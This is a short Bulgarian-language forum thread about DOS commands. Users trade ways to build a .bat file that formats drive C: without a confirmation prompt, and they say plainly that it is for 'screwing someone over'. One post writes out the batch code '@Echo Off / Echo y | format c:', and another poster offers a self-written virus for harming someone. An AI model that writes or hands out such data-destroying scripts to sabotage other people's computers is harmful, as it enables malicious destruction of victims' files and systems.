дос команди

Статус
Not open for further replies.
Ами format C:\ |-y мисля,че беше, тоест ако искаш да правиш някакъв "хак" в смисъл да прецакаш някого с .бат - то това ти трябва, а ако е за теб просто format C:\ и си потвърждаваш сам ! :D
 
rosko каза:
Ами format C:\ |-y мисля,че беше, тоест ако искаш да правиш някакъв "хак" в смисъл да прецакаш някого с .бат - то това ти трябва, а ако е за теб просто format C:\ и си потвърждаваш сам ! :D
Няма да стане,защото той работи на този дял ;)
 
Код:
@Echo Off
Echo y | format c:
в .bat file
Ако ще е да правиш мизерия на някой, да ти дам един вирус, писан от мен и да знаеш, че после оня ще види доста зор :)
 
Статус
Not open for further replies.

Back
Горе